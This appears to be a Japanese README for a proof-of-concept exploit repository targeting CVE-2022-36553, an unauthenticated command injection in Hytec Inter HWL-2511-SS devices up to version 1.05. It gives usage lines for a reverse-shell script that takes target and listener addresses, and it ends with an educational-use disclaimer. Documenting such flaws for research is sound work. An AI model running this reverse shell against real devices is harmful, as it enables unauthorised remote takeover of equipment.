
CVE-2022-36553 の PoC スクリプト: Hytec Inter HWL-2511-SS デバイスにおける認証なしのリモートコマンドインジェクション脆弱性を悪用します。
このリポジトリには、Hytec Inter HWL-2511-SS デバイスにおける重大な脆弱性である CVE-2022-36553 を悪用するための Proof of Concept(PoC)リバースシェルスクリプトが含まれています。このスクリプトは実用的なデモンストレーションであり、私のブログ記事「Hytec Inter HWL-2511-SS - Vulnerability Report」で提供している詳細な分析を補完するものです。
すべての Hytec Inter HWL-2511-SS デバイスでバージョン 1.05 以下。
# Usage: python HWL-2511-SS.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python HWL-2511-SS.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

教育目的のみに使用してください。